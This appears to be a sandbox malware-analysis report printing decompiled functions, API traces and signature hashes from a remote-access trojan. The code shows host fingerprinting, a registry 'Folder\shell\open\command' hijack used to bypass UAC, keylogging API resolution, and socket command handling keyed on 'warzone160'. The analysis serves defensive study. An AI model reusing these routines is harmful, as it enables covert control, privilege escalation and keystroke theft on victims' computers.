                                      				_t84 = __eflags;
                                      				_t54 = __ecx;
                                      				_t76 = __edx;
                                      				E0043D7A9(E0043D8DA( &_v24, __edx),  &_v20);
                                      				GetModuleFileNameA(0,  &_v344, 0x104);
                                      				_v16 = 0;
                                      				_t28 = E0043FC79( &_v344,  &_v16);
                                      				_v12 = 0;
                                      				E0043F9F3(_t28, _v16,  &_v12,  &_v12);
                                      				_t82 = _t81 + 4;
                                      				E00433412(_t82, _v20);
                                      				E00433412(_t82, _v24);
                                      				_t32 = E0043D9BA();
                                      				E00433412(_t82, 0x442608);
                                      				_t64 = _t82;
                                      				E0043DC19(_t82);
                                      				_t35 = E0043DBF3(_t82);
                                      				_t36 = E0043DB97();
                                      				_t37 = E0043D9DD();
                                      				E0043DC53(_t82, _v16);
                                      				E00434B53(_t54, E00433EA1( &_v76, _v16, _t84, _t82, _t64, 0xdc, _t37, _t36, _t35, _t82, _t82, _v12, _t32, _t82, _t75));
                                      				E00433E5F( &_v76, _t76);
                                      				if( *((intOrPtr*)(_t76 + 0x34)) != 0) {
                                      					E00431052( &_v864, 0, 0x208);
                                      					__imp__SHGetFolderPathW(0, 0x1c, 0, 0,  &_v864);
                                      					lstrcatW( &_v864, L"\\Microsoft Vision\\");
                                      					CreateDirectoryW( &_v864, 0);
                                      					E004385B6(_t54, 1);
                                      					_v12 = 0x444970;
                                      					E00434B53(_t54,  &_v12);
                                      				}
                                      				E00435A2D(_v20);
                                      				return E00435A2D(_v24);
                                      			}

                                      APIs
                                        • Part of subcall function 0043D7A9: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0043D7C0
                                        • Part of subcall function 0043D7A9: CoInitialize.OLE32(00000000), ref: 0043D7C7
                                        • Part of subcall function 0043D7A9: CoCreateInstance.OLE32(00442460,00000000,00000017,00444330,?), ref: 0043D7E5
                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00432B58
                                        • Part of subcall function 0043FC79: CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 0043FCA6
                                        • Part of subcall function 0043FC79: GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,?,?,00432B6F), ref: 0043FCB1
                                        • Part of subcall function 0043FC79: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0043FCC2
                                        • Part of subcall function 0043FC79: CloseHandle.KERNEL32(00000000), ref: 0043FCC9
                                        • Part of subcall function 00433412: lstrlenW.KERNEL32(0043FC61,00000000,?,0043FC61,00000000,?,00000000), ref: 0043341B
                                        • Part of subcall function 00433412: lstrlenW.KERNEL32(0043FC61,?,0043FC61,00000000,?,00000000), ref: 00433432
                                        • Part of subcall function 00433412: lstrcpyW.KERNEL32(?,0043FC61), ref: 0043344D
                                        • Part of subcall function 0043D9BA: GlobalMemoryStatusEx.KERNEL32(?), ref: 0043D9CB
                                        • Part of subcall function 0043DC19: GetComputerNameW.KERNEL32(00432BB8,00000010), ref: 0043DC3C
                                        • Part of subcall function 0043DBF3: GetCurrentProcess.KERNEL32(?,?,00432BBD,?,00442608,?,?,00000000,?,?,?), ref: 0043DBF7
                                        • Part of subcall function 0043DB97: GetCurrentProcess.KERNEL32(00000008,00000000,?,?,?,00000000), ref: 0043DBA9
                                        • Part of subcall function 0043DB97: OpenProcessToken.ADVAPI32(00000000,?,?,?,00000000), ref: 0043DBB0
                                        • Part of subcall function 0043DB97: GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,00000000), ref: 0043DBCE
                                        • Part of subcall function 0043DB97: CloseHandle.KERNEL32(00000000), ref: 0043DBE3
                                        • Part of subcall function 0043D9DD: LoadLibraryA.KERNEL32(ntdll.dll), ref: 0043D9F5
                                        • Part of subcall function 0043D9DD: GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 0043DA05
                                        • Part of subcall function 0043DC53: RegOpenKeyExW.ADVAPI32(80000002,00000000,00000000,00000101,?,SOFTWARE\Microsoft\Cryptography,?,?,?,?,00000000,?,?,?), ref: 0043DC97
                                      • SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00432C18
                                      • lstrcatW.KERNEL32(?,\Microsoft Vision\), ref: 00432C2A
                                      • CreateDirectoryW.KERNEL32(?,00000000,?,?), ref: 00432C38
                                        • Part of subcall function 004385B6: InitializeCriticalSection.KERNEL32(?,?,00000000,?,?,?,?,00432C46,?,00000001,?,?), ref: 004385C2
                                        • Part of subcall function 004385B6: DeleteCriticalSection.KERNEL32(?,?,00000000,?,?,?,?,00432C46,?,00000001,?,?), ref: 004385D9
                                        • Part of subcall function 004385B6: EnterCriticalSection.KERNEL32(004477C8,?,00000000,?,?,?,?,00432C46,?,00000001,?,?), ref: 004385E5
                                        • Part of subcall function 004385B6: GetModuleHandleA.KERNEL32(00000000,?,00000000,?,?,?,?,00432C46,?,00000001,?,?), ref: 004385F5
                                        • Part of subcall function 004385B6: LeaveCriticalSection.KERNEL32(004477C8,?,00000000), ref: 00438648
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CriticalFileSection$CreateHandleInitializeProcess$CloseCurrentModuleNameOpenTokenlstrlen$AddressComputerDeleteDirectoryEnterFolderGlobalInformationInstanceLeaveLibraryLoadMemoryPathProcReadSecuritySizeStatuslstrcatlstrcpy
                                      • String ID: \Microsoft Vision\$pID
                                      • API String ID: 1987359387-3233517829
                                      • Opcode ID: 5ae71abd75c3b45ef96c98d6367c035afc78a40b251cf21ae3880f4ae1fb508f
                                      • Instruction ID: 4f7f3de7dcd0c084939795f98f4321327fec1a2c36eb812e377a9edfc52bdedf
                                      • Opcode Fuzzy Hash: 5ae71abd75c3b45ef96c98d6367c035afc78a40b251cf21ae3880f4ae1fb508f
                                      • Instruction Fuzzy Hash: A93198B1D00518BBDB04FBA1DC46EEFB77CAF48309F40606EB115A2192DA785A45CBA9
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      APIs
                                        • Part of subcall function 00CC987E: _free.LIBCMT ref: 00CC98A3
                                      • _free.LIBCMT ref: 00CC9904
                                        • Part of subcall function 00CC628A: HeapFree.KERNEL32(00000000,00000000), ref: 00CC62A0
                                        • Part of subcall function 00CC628A: GetLastError.KERNEL32(?,?,00CC98A8,?,00000000,?,00000000,?,00CC98CF,?,00000007,?,?,00CC9CD3,?,?), ref: 00CC62B2
                                      • _free.LIBCMT ref: 00CC990F
                                      • _free.LIBCMT ref: 00CC991A
                                      • _free.LIBCMT ref: 00CC996E
                                      • _free.LIBCMT ref: 00CC9979
                                      • _free.LIBCMT ref: 00CC9984
                                      • _free.LIBCMT ref: 00CC998F
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.578723047.00CC1000.00000020.00020000.sdmp, Offset: 00CC0000, based on PE: true
                                      • Associated: 00000003.00000002.578708562.00CC0000.00000002.00020000.sdmp
                                      • Associated: 00000003.00000002.578805483.00CE2000.00000002.00020000.sdmp
                                      • Associated: 00000003.00000002.578834966.00CEB000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578847102.00CEC000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578856272.00CED000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578871909.00CEF000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578928306.00D80000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578946601.00D81000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578962758.00D84000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578971084.00D85000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578988900.00D87000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.579002903.00D89000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.579026291.00D8D000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.579044316.00D8E000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.579062903.00D91000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.579083023.00D93000.00000002.00020000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_cc0000_images.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: 815bc0071f0b4a8f649899424cf45e433ae55eb76270d98698b1a9d2e1f79aa2
                                      • Instruction ID: 3c77ee450d83bef6ea3fc82a720ac5364fb7e91ba90254ed1d6c9d596ba9e45d
                                      • Opcode Fuzzy Hash: 815bc0071f0b4a8f649899424cf45e433ae55eb76270d98698b1a9d2e1f79aa2
                                      • Instruction Fuzzy Hash: B411D072544704A6D560BBB0CD4BFCB779DAF0A700F40491DF29B6B1A3DE75E504ABA0
                                      Uniqueness

                                      Uniqueness Score: 0.03%

                                      C-Code - Quality: 100%
                                      			E0043F6C1() {
                                      				void* _v8;
                                      				int _v12;
                                      				int _v16;
                                      				struct _SECURITY_DESCRIPTOR* _v20;
                                      				struct _SECURITY_ATTRIBUTES _v24;
                                      				struct _SECURITY_DESCRIPTOR _v44;
                                      				long _t20;
                                      
                                      				if(InitializeSecurityDescriptor( &_v44, 1) == 0 || SetSecurityDescriptorDacl( &_v44, 1, 0, 0) == 0) {
                                      					L5:
                                      					return 0;
                                      				} else {
                                      					_v24 = 0xc;
                                      					_v20 =  &_v44;
                                      					_v16 = 0;
                                      					_t20 = RegCreateKeyExA(0x80000001, "Software\\Classes\\Folder\\shell\\open\\command", 0, 0, 0, 0x20006,  &_v24,  &_v8,  &_v12);
                                      					if(_t20 != 0) {
                                      						SetLastError(_t20);
                                      						goto L5;
                                      					}
                                      					RegCloseKey(_v8);
                                      					return 1;
                                      				}
                                      			}


                                      APIs
                                      • InitializeSecurityDescriptor.ADVAPI32(?,00000001,00000000,?,?,?,?,?,?,?,?,?,0043F901), ref: 0043F6CE
                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00000000,00000000,?,?,?,?,?,?,?,?,?,0043F901), ref: 0043F6E2
                                      • RegCreateKeyExA.ADVAPI32(80000001,Software\Classes\Folder\shell\open\command,00000000,00000000,00000000,00020006,0000000C,0043F901,?), ref: 0043F71A
                                      • RegCloseKey.ADVAPI32(0043F901), ref: 0043F727
                                      • SetLastError.KERNEL32(00000000), ref: 0043F732
                                      Strings
                                      • Software\Classes\Folder\shell\open\command, xrefs: 0043F710
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: DescriptorSecurity$CloseCreateDaclErrorInitializeLast
                                      • String ID: Software\Classes\Folder\shell\open\command
                                      • API String ID: 1473660444-2536721355
                                      • Opcode ID: 4d76812b5b12f536430042e04b28cc929e009487ea006c032678460e5f672b8e
                                      • Instruction ID: 8ceaccb331f250df422791b7480b7c88b280f99e8dc0a0a18dca9b8cd2f4666d
                                      • Opcode Fuzzy Hash: 4d76812b5b12f536430042e04b28cc929e009487ea006c032678460e5f672b8e
                                      • Instruction Fuzzy Hash: EA01DA75D01228BAEB209BA19D49EDF7FFCEF0A755F501032F905F2140D7B49645CAA4
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      C-Code - Quality: 100%
                                      			E004385B6(char _a4, intOrPtr _a8) {
                                      				void _v28;
                                      				void* _t13;
                                      				signed int _t14;
                                      
                                      				InitializeCriticalSection( &_v28);
                                      				_t14 = 6;
                                      				DeleteCriticalSection(memcpy(0x4477c8,  &_v28, _t14 << 2));
                                      				EnterCriticalSection(0x4477c8);
                                      				_t5 =  &_a4; // 0x432c46
                                      				 *0x4477f0 =  *_t5;
                                      				GetModuleHandleA(0);
                                      				 *0x446690 = 0x446da0;
                                      				if(_a8 == 0) {
                                      					E00431E9A(0x447814);
                                      					 *0x446da0 = 1;
                                      					_t13 = E00431E6F(0x44780c, E0043822F, 0x446da0);
                                      				} else {
                                      					_t13 = E00431E6F(0x447814, E004374B4, 0x446da0);
                                      					 *0x4477b4 = 1;
                                      				}
                                      				LeaveCriticalSection(0x4477c8);
                                      				return _t13;
                                      			}


                                      APIs
                                      • InitializeCriticalSection.KERNEL32(?,?,00000000,?,?,?,?,00432C46,?,00000001,?,?), ref: 004385C2
                                      • DeleteCriticalSection.KERNEL32(?,?,00000000,?,?,?,?,00432C46,?,00000001,?,?), ref: 004385D9
                                      • EnterCriticalSection.KERNEL32(004477C8,?,00000000,?,?,?,?,00432C46,?,00000001,?,?), ref: 004385E5
                                      • GetModuleHandleA.KERNEL32(00000000,?,00000000,?,?,?,?,00432C46,?,00000001,?,?), ref: 004385F5
                                      • LeaveCriticalSection.KERNEL32(004477C8,?,00000000), ref: 00438648
                                        • Part of subcall function 00431E6F: CreateThread.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 00431E84
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CriticalSection$CreateDeleteEnterHandleInitializeLeaveModuleThread
                                      • String ID: F,C
                                      • API String ID: 2964645253-1571967972
                                      • Opcode ID: 30f0c2512a4dcc3e4af5c0b8373fa1bb9b92f09ca8d69666a983d5141bf25c19
                                      • Instruction ID: ff2affabda82d1d304edac901e9d035713468b44fc76b3976835f8fbc6f32bd8
                                      • Opcode Fuzzy Hash: 30f0c2512a4dcc3e4af5c0b8373fa1bb9b92f09ca8d69666a983d5141bf25c19
                                      • Instruction Fuzzy Hash: 7E01D475904204ABEB00AF51AC0FA9F3F69EB8A715F81402BFA0557260CBBD5406CBAD
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      C-Code - Quality: 79%
                                      			E00438654() {
                                      				intOrPtr _t1;
                                      
                                      				_t1 = 5;
                                      				 *0x4477c4 = _t1;
                                      				 *0x446dac = 0;
                                      				 *0x4477bc = _t1;
                                      				 *0x4477c0 = 0;
                                      				E00431815(0x4477b8, 0);
                                      				InitializeCriticalSection(0x4477c8);
                                      				E0043DE6C(0x4477f4, 0);
                                      				asm("xorps xmm0, xmm0");
                                      				 *0x4477e0 = 0;
                                      				asm("movups [0x44780c], xmm0");
                                      				 *0x4477f0 = 0;
                                      				_t19 = LoadLibraryW(L"User32.dll");
                                      				_push(0x4477f4);
                                      				 *0x4477e4 = E0043E907(_t4, "GetRawInputData", 0);
                                      				 *0x4477ec = E0043E907(_t19, "ToUnicode", 0);
                                      				 *0x4477e8 = E0043E907(_t19, "MapVirtualKeyA", 0);
                                      				return 0x446da0;
                                      			}


                                      APIs
                                      • InitializeCriticalSection.KERNEL32(004477C8,?,004311C1), ref: 0043867F
                                      • LoadLibraryW.KERNEL32(User32.dll), ref: 004386AA
                                        • Part of subcall function 0043E907: lstrcmpA.KERNEL32(?,0043F9CB,?,open,0043F9CB), ref: 0043E940
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CriticalInitializeLibraryLoadSectionlstrcmp
                                      • String ID: GetRawInputData$MapVirtualKeyA$ToUnicode$User32.dll
                                      • API String ID: 4274177235-2474467583
                                      • Opcode ID: 22f50f49d8a58d5070d71bc3f60ee46eb92931e5b16a5226bb23ce7603d4210b
                                      • Instruction ID: 909a2bda9e7d76ee485c363074a3abfa7f95a6acdc533d047326d8401931f12c
                                      • Opcode Fuzzy Hash: 22f50f49d8a58d5070d71bc3f60ee46eb92931e5b16a5226bb23ce7603d4210b
                                      • Instruction Fuzzy Hash: B8014FB8A096204BE744FF26AD052193E91EB8AB187D1913FF00897364DB782842CB8D
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      C-Code - Quality: 73%
                                      			E0043F65C(void* __ecx, char* _a4, CHAR* _a8) {
                                      				void* _v8;
                                      				long _t9;
                                      				int _t12;
                                      				int _t15;
                                      				long _t16;
                                      
                                      				_t15 = lstrlenA(_a8);
                                      				_t9 = RegOpenKeyExA(0x80000001, "Software\\Classes\\Folder\\shell\\open\\command", 0, 0x20006,  &_v8);
                                      				if(_t9 == 0) {
                                      					_t16 = RegSetValueExA(_v8, _a4, 0, 1, _a8, _t15);
                                      					RegCloseKey(_v8);
                                      					if(_t16 == 0) {
                                      						_t12 = 1;
                                      					} else {
                                      						_push(_t16);
                                      						goto L2;
                                      					}
                                      				} else {
                                      					_push(_t9);
                                      					L2:
                                      					SetLastError();
                                      					_t12 = 0;
                                      				}
                                      				return _t12;
                                      			}


                                      APIs
                                      • lstrlenA.KERNEL32(0043F938,00444713,?,?,0043F938,00444713,?), ref: 0043F664
                                      • RegOpenKeyExA.ADVAPI32(80000001,Software\Classes\Folder\shell\open\command,00000000,00020006,?,?,?,0043F938,00444713,?), ref: 0043F681
                                      • SetLastError.KERNEL32(00000000,?,?,0043F938,00444713,?), ref: 0043F68C
                                      • RegSetValueExA.ADVAPI32(?,00444713,00000000,00000001,0043F938,00000000,?,?,0043F938,00444713,?), ref: 0043F6A4
                                      • RegCloseKey.ADVAPI32(?,?,?,0043F938,00444713,?), ref: 0043F6AF
                                      Strings
                                      • Software\Classes\Folder\shell\open\command, xrefs: 0043F677
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseErrorLastOpenValuelstrlen
                                      • String ID: Software\Classes\Folder\shell\open\command
                                      • API String ID: 1613093083-2536721355
                                      • Opcode ID: 767bbaa3f1aad34e9d7f92d405bf4cec0bcb1f28ba7cac136047ad57135dea49
                                      • Instruction ID: bf3edbdafc2ed9b901726211592195ebb011ae88cac686587b26bdaa80c411bb
                                      • Opcode Fuzzy Hash: 767bbaa3f1aad34e9d7f92d405bf4cec0bcb1f28ba7cac136047ad57135dea49
                                      • Instruction Fuzzy Hash: D3F09639940214BBDF211F909D0AFDF3BA9EF09751F510061BE05B6160D6B58E05E69C
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.578723047.00CC1000.00000020.00020000.sdmp, Offset: 00CC0000, based on PE: true
                                      • Associated: 00000003.00000002.578708562.00CC0000.00000002.00020000.sdmp
                                      • Associated: 00000003.00000002.578805483.00CE2000.00000002.00020000.sdmp
                                      • Associated: 00000003.00000002.578834966.00CEB000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578847102.00CEC000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578856272.00CED000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578871909.00CEF000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578928306.00D80000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578946601.00D81000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578962758.00D84000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578971084.00D85000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578988900.00D87000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.579002903.00D89000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.579026291.00D8D000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.579044316.00D8E000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.579062903.00D91000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.579083023.00D93000.00000002.00020000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_cc0000_images.jbxd
                                      Similarity
                                      • API ID: _free
                                      • String ID: *?$.
                                      • API String ID: 269201875-3972193922
                                      • Opcode ID: 176ca1dfeeaba7049e50e9e5823c34ed6f47d4fca2541c5520a5665a2d5b650c
                                      • Instruction ID: 5cab7db6fbb0ece13e0c75d904e2c3d9b8d010838bb47524a1dbec25b4223004
                                      • Opcode Fuzzy Hash: 176ca1dfeeaba7049e50e9e5823c34ed6f47d4fca2541c5520a5665a2d5b650c
                                      • Instruction Fuzzy Hash: 6B613B76D002099FDF14CFA9C981AEEFBF5EF48310B24416EE855E7300EA31AE459B90
                                      Uniqueness

                                      Uniqueness Score: 0.75%

                                      C-Code - Quality: 79%
                                      			E004351E4(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
                                      				char _v12;
                                      				char _v16;
                                      				char _v20;
                                      				char _v24;
                                      				char _v28;
                                      				char _v36;
                                      				char _v44;
                                      				char _v52;
                                      				char _v56;
                                      				char _v60;
                                      				char _v65600;
                                      				void* _t45;
                                      				char* _t52;
                                      				intOrPtr _t77;
                                      				void* _t83;
                                      				void* _t84;
                                      				void* _t85;
                                      				void* _t108;
                                      				char* _t109;
                                      				void* _t112;
                                      				void* _t113;
                                      				void* _t114;
                                      
                                      				_t108 = __edx;
                                      				_t85 = __ecx;
                                      				_t45 = E00431130(0x10040, __ecx);
                                      				_t84 = _t85;
                                      				if( *((intOrPtr*)(_t84 + 0xc)) != 0xffffffff) {
                                      					_v28 = 0xea60;
                                      					__imp__#21( *((intOrPtr*)(_t84 + 0xc)), 0xffff, 0x1006,  &_v28, 4);
                                      					E00431052( &_v65600, 0, 0xffff);
                                      					_t114 = _t113 + 0xc;
                                      					_v60 = 0;
                                      					_v56 = 0;
                                      					E00432E33( &_v44, _t108, E004331EC( &_v12, "warzone160"));
                                      					E00435A2D(_v12);
                                      					_v16 = 0;
                                      					_v12 = 0;
                                      					do {
                                      						_t52 =  &_v65600;
                                      						__imp__#16( *((intOrPtr*)(_t84 + 0xc)), _t52, 0xc, 0);
                                      						_t109 = _t52;
                                      						if(_t109 != 0xc) {
                                      							if(_t109 == 0xffffffff) {
                                      								break;
                                      							}
                                      							goto L8;
                                      						}
                                      						_v24 = 0;
                                      						_t102 =  &_v24;
                                      						_v20 = 0;
                                      						E00432DC1( &_v24,  &_v65600, _t52);
                                      						_t103 = _t114;
                                      						E00432E79(_t114,  &_v24);
                                      						E00432E79(_t114,  &_v44);
                                      						E00435C32( &_v52, _t108, _t114, _t103,  &_v24, _t102);
                                      						_t114 = _t114 + 0x10;
                                      						_t77 =  *((intOrPtr*)(_v52 + 4));
                                      						_t112 = _t77 + 0xc;
                                      						if(_t77 == 0 || _t112 == _t109) {
                                      							L6:
                                      							E00432E66( &_v52);
                                      							E00432E66( &_v24);
                                      						} else {
                                      							do {
                                      								_t83 =  &_v65600 + _t109;
                                      								__imp__#16( *((intOrPtr*)(_t84 + 0xc)), _t83, _t112 - _t109, 0);
                                      								_t109 = _t109 + _t83;
                                      							} while (_t112 != _t109);
                                      							goto L6;
                                      						}
                                      						L8:
                                      						_t92 =  &_v16;
                                      						E00432DC1( &_v16,  &_v65600, _t109);
                                      						_t93 = _t114;
                                      						E00432E79(_t114,  &_v16);
                                      						E00432E79(_t114,  &_v44);
                                      						E00435C32( &_v36, _t108, _t114, _t93,  &_v16, _t92);
                                      						_t114 = _t114 + 0x10;
                                      						E00432DF3(_t84 + 0x10);
                                      						E00432DC1(_t84 + 0x10, _v36, _t109);
                                      						E00432DF3( &_v16);
                                      						E00432DF3( &_v36);
                                      						E00434B8D(_t84, _t108, _a4);
                                      						E00432E66( &_v36);
                                      						_push(0);
                                      						_pop(0);
                                      					} while (_t109 > 0);
                                      					E00432E66( &_v16);
                                      					E00432E66( &_v44);
                                      					return E00432E66( &_v60);
                                      				}
                                      				return _t45;
                                      			}

                                      APIs
                                      • setsockopt.WS2_32(000000FF,0000FFFF,00001006,?,00000004), ref: 0043521B
                                        • Part of subcall function 004331EC: lstrlenA.KERNEL32(?,?,?,004355DF,.bss,00000000,?,?,00000000), ref: 004331F5
                                        • Part of subcall function 004331EC: lstrlenA.KERNEL32(?,?,?,004355DF,.bss,00000000,?,?,00000000), ref: 00433202
                                        • Part of subcall function 004331EC: lstrcpyA.KERNEL32(00000000,?,?,?,004355DF,.bss,00000000,?,?,00000000), ref: 00433215
                                        • Part of subcall function 00435A2D: VirtualFree.KERNELBASE(00000000,00000000,00008000,0043E2AE,?,?,?,?,?,00000000), ref: 00435A35
                                      • recv.WS2_32(000000FF,?,0000000C,00000000), ref: 0043526B
                                      • recv.WS2_32(000000FF,?,000000FF,00000000), ref: 004352D7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrlenrecv$FreeVirtuallstrcpysetsockopt
                                      • String ID: `$warzone160
                                      • API String ID: 3973575906-811885577
                                      • Opcode ID: df808bec8a93ef67bf8a401f68e4c53648070a6fa6137b6948341dadcd5e3bae
                                      • Instruction ID: 5e971ac5538c6efe250bd282757d136405ed309f6beaa4abaf614bb68cb9bfe5
                                      • Opcode Fuzzy Hash: df808bec8a93ef67bf8a401f68e4c53648070a6fa6137b6948341dadcd5e3bae
                                      • Instruction Fuzzy Hash: 7C419371900118ABCF15EF65DC86DEFBB38FF58354F00116EF815A6191DB785A44CBA8
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      C-Code - Quality: 32%
                                      			E0043DC53(intOrPtr* __ecx, void* __edx) {
                                      				void* _v8;
                                      				char _v12;
                                      				char _v16;
                                      				int _v20;
                                      				char _v24;
                                      				int* _t18;
                                      				void* _t48;
                                      				int* _t50;
                                      				intOrPtr _t53;
                                      
                                      				_t48 = __edx;
                                      				_t35 = __ecx;
                                      				_t50 = __ecx;
                                      				_v8 = 0;
                                      				_v24 = 0;
                                      				_v20 = 0;
                                      				 *((intOrPtr*)(__ecx)) = 0;
                                      				 *((intOrPtr*)(__ecx + 4)) = 0;
                                      				_t53 =  *0x447d48; // 0x0
                                      				if(_t53 != 0) {
                                      					_t18 = 0x447d44;
                                      				} else {
                                      					RegOpenKeyExW(0x80000002,  *(E00433412( &_v12, L"SOFTWARE\\Microsoft\\Cryptography")), 0, 0x101,  &_v8);
                                      					asm("sbb esi, esi");
                                      					E00435A2D(_v12);
                                      					if(1 != 0) {
                                      						E0043EF61( &_v8, _t48, E00433412( &_v12, L"MachineGuid"),  &_v24);
                                      						E00435A2D(_v12);
                                      						E0043EF4C( &_v8);
                                      					}
                                      					E00432CCC(_t50, E00435C02( &_v16,  &_v24));
                                      					E00432E66( &_v16);
                                      					_t35 = 0x447d44;
                                      					_t18 = _t50;
                                      				}
                                      				E00432CCC(_t35, _t18);
                                      				E00432E66( &_v24);
                                      				E0043EF4C( &_v8);
                                      				return _t50;
                                      			}

                                      APIs
                                        • Part of subcall function 00433412: lstrlenW.KERNEL32(0043FC61,00000000,?,0043FC61,00000000,?,00000000), ref: 0043341B
                                        • Part of subcall function 00433412: lstrlenW.KERNEL32(0043FC61,?,0043FC61,00000000,?,00000000), ref: 00433432
                                        • Part of subcall function 00433412: lstrcpyW.KERNEL32(?,0043FC61), ref: 0043344D
                                      • RegOpenKeyExW.ADVAPI32(80000002,00000000,00000000,00000101,?,SOFTWARE\Microsoft\Cryptography,?,?,?,?,00000000,?,?,?), ref: 0043DC97
                                        • Part of subcall function 00435A2D: VirtualFree.KERNELBASE(00000000,00000000,00008000,0043E2AE,?,?,?,?,?,00000000), ref: 00435A35
                                        • Part of subcall function 0043EF61: RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,00000000,?,00000000,?,?,?,?,0043F3B9,?,0000000A,80000001), ref: 0043EF84
